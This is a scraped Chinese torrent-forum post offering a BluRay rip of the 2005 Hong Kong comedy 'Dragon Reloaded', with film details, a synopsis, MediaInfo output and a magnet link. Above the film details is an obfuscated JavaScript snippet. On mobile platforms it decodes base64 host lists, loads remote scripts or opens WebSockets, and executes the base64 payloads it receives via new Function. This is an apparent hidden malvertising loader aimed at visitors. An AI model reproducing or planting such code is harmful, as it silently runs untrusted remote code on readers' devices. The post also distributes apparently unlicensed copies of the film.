龙咁威2[国语配音/粤语配音].Dragon.Reloaded.2005.1080p.BluRay.x265.10bit.DTS.2Audio 5.54GB

版主小s 1月前 207

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 龙咁威2 / Dragon Reloaded
◎片  名 龍咁威2之皇母娘娘呢?
◎年  代 2005
◎产  地 中国香港
◎类  别 剧情 / 喜剧 / 动作 / 爱情
◎语  言 粤语 / 英语 / 法语 / 日语
◎上映日期 2005-06-30
◎IMDb链接 https://www.imdb.com/title/tt0471243/
◎豆瓣评分 6.2/10 (3709人评价)
◎豆瓣链接 https://movie.douban.com/subject/1419584/
◎片  长 101 分钟
◎导  演 谷德昭 Vincent Kok (id:1025526)
◎编  剧 叶念琛 Patrick Kong (id:1274344)
       谷德昭 Vincent Kok (id:1025526)
◎演  员 邓梓峰 Chi-Fung Tang (id:1320111)
       朱咪咪 Mimi Chu (id:1275715)
       黎应就 Guy Lai (id:1345936)
       鲁芬 Fun Lo (id:1316723)
       唐诗咏 Natalie Tong (id:1046958)
       卢惠光 Ken Lo (id:1032633)
       李灿森 Sam Lee (id:1028522)
       夏雨 Yu Ha (id:1315323)
       陈达志 Tat Chi Chan (id:1443399)
       吴雨霏 Kary Ng (id:1019562)
       徐志雄 Terence Tsui (id:1331330)
       庄思敏 Jacquelin Chong (id:1326932)
       元华 Wah Yuen (id:1050240)
       傅颖 Theresa Fu (id:1051442)
       皮特·斯普瑞尔 Pete Spurrier (id:1205379)
       张达明 Tat-Ming Cheung (id:1274433)
       刘以达 Tats Lau (id:1034328)
       郑中基 Ronald Cheng (id:1032940)
       杨爱瑾 Miki Yeung (id:1006188)
       陈达志 Tat Chi Chan (id:1443399)
       谷德昭 Vincent Kok (id:1025526)
       黄柏高 Paco Wong Pak Go (id:1343341)
       黄英华 Ying-Wah Wong (id:1301204)
       邝志良 Chi-Leung Kwong (id:1289164)
       邓汝好 Pat Tang Yu-Ho (id:1403989)
       曾景祥 Kinson Tsang (id:1299575)
       邓允贤 Wan Yin Tang (id:1365732)

◎标  签 喜剧 / 香港 / 郑中基 / 香港电影 / 谷德昭 / 搞笑 / 2005 / 张达明

◎简  介
  龙威(郑中基 饰)及好兄弟吴树喜(李灿森 饰)、黄金舟(张达明 饰)已成为警察2年了,但仍然沉迷游乐。他们几个来到了皇母瑶池村泡温泉,竟然破坏了飞虎队的围捕计划,原来是该村村民猫屎强偷走了镇村之宝的皇母娘娘像。为了平息民愤,警队决定把龙威几个派到该村当警长。村民们都觉得他们是瘟神,处处为难他们。龙威喜欢上了村中女孩小柔(杨爱瑾 饰),小柔父亲见龙威的骨骼精奇,便决定教会龙威咏春。龙威学有所成,打败了临村恶霸。因为龙威等人的善良,村民们也消除了对他们的成见。一年一度的皇母娘娘诞又来了,警方认为猫屎强会再次回到该村偷另一尊佛像,决定这次要将他绳之于法,但龙威却觉得猫屎强的到来是另有原因……

◎获奖情况 (共1项)
  第25届香港电影金像奖 (2006)
  最佳原创电影歌曲(提名)
   └──郑中基 (id:1032940)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 75264144641950536728941098431326625724 (0x389F58D45DF0521D2D2BBB5003469FBC)

  4. Complete name                            : [email protected]QDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.54 GiB

  8. Duration                                 : 1 h 40 min

  9. Overall bit rate                         : 7 851 kb/s

  10. Encoded date                             : UTC 2021-08-21 08:03:59

  11. Writing application                      : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 40 min

  20. Bit rate                                 : 4 777 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 1 080 pixels

  23. Display aspect ratio                     : 16:9

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.096

  30. Stream size                              : 3.37 GiB (61%)

  31. Writing library                          : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=24.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  33. Default                                  : Yes

  34. Forced                                   : No


  35. Audio #1

  36. ID                                       : 2

  37. Format                                   : DTS

  38. Format/Info                              : Digital Theater Systems

  39. Codec ID                                 : A_DTS

  40. Duration                                 : 1 h 40 min

  41. Bit rate mode                            : Constant

  42. Bit rate                                 : 1 510 kb/s

  43. Channel(s)                               : 6 channels

  44. Channel layout                           : C L R Ls Rs LFE

  45. Sampling rate                            : 48.0 kHz

  46. Frame rate                               : 93.750 FPS (512 SPF)

  47. Bit depth                                : 24 bits

  48. Compression mode                         : Lossy

  49. Stream size                              : 1.06 GiB (19%)

  50. Title                                    : Cantonese

  51. Language                                 : Chinese

  52. Default                                  : Yes

  53. Forced                                   : No


  54. Audio #2

  55. ID                                       : 3

  56. Format                                   : DTS

  57. Format/Info                              : Digital Theater Systems

  58. Codec ID                                 : A_DTS

  59. Duration                                 : 1 h 40 min

  60. Bit rate mode                            : Constant

  61. Bit rate                                 : 1 510 kb/s

  62. Channel(s)                               : 6 channels

  63. Channel layout                           : C L R Ls Rs LFE

  64. Sampling rate                            : 48.0 kHz

  65. Frame rate                               : 93.750 FPS (512 SPF)

  66. Bit depth                                : 24 bits

  67. Compression mode                         : Lossy

  68. Stream size                              : 1.06 GiB (19%)

  69. Title                                    : Mandarin

  70. Language                                 : Chinese

  71. Default                                  : No

  72. Forced                                   : No


  73. Text #1

  74. ID                                       : 4

  75. ID in the original source medium         : 4609 (0x1201)

  76. Format                                   : PGS

  77. Muxing mode                              : zlib

  78. Codec ID                                 : S_HDMV/PGS

  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration                                 : 1 h 36 min

  81. Bit rate                                 : 49.5 kb/s

  82. Count of elements                        : 2948

  83. Stream size                              : 34.3 MiB (1%)

  84. Title                                    : chs

  85. Language                                 : Chinese

  86. Default                                  : Yes

  87. Forced                                   : No

  88. Original source medium                   : Blu-ray


  89. Text #2

  90. ID                                       : 5

  91. ID in the original source medium         : 4608 (0x1200)

  92. Format                                   : PGS

  93. Muxing mode                              : zlib

  94. Codec ID                                 : S_HDMV/PGS

  95. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration                                 : 1 h 36 min

  97. Bit rate                                 : 50.4 kb/s

  98. Count of elements                        : 2948

  99. Stream size                              : 34.9 MiB (1%)

  100. Title                                    : cht

  101. Language                                 : Chinese

  102. Default                                  : No

  103. Forced                                   : No

  104. Original source medium                   : Blu-ray


  105. Text #3

  106. ID                                       : 6

  107. ID in the original source medium         : 4610 (0x1202)

  108. Format                                   : PGS

  109. Muxing mode                              : zlib

  110. Codec ID                                 : S_HDMV/PGS

  111. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration                                 : 1 h 36 min

  113. Bit rate                                 : 53.2 kb/s

  114. Count of elements                        : 2911

  115. Stream size                              : 36.9 MiB (1%)

  116. Language                                 : English

  117. Default                                  : No

  118. Forced                                   : No

  119. Original source medium                   : Blu-ray


  120. Menu

  121. 00:00:00.000                             : en:第 01 章

  122. 00:07:33.416                             : en:第 02 章

  123. 00:16:50.375                             : en:第 03 章

  124. 00:26:48.041                             : en:第 04 章

  125. 00:32:55.875                             : en:第 05 章

  126. 00:41:21.750                             : en:第 06 章

  127. 00:49:17.875                             : en:第 07 章

  128. 00:59:31.291                             : en:第 08 章

  129. 01:08:28.500                             : en:第 09 章

  130. 01:13:21.791                             : en:第 10 章

  131. 01:22:30.958                             : en:第 11 章

  132. 01:32:19.291                             : en:第 12 章



TAGS 动作 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:858E1C53C1B7FE23AEC0F6D7FE250AED3EA9F75E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回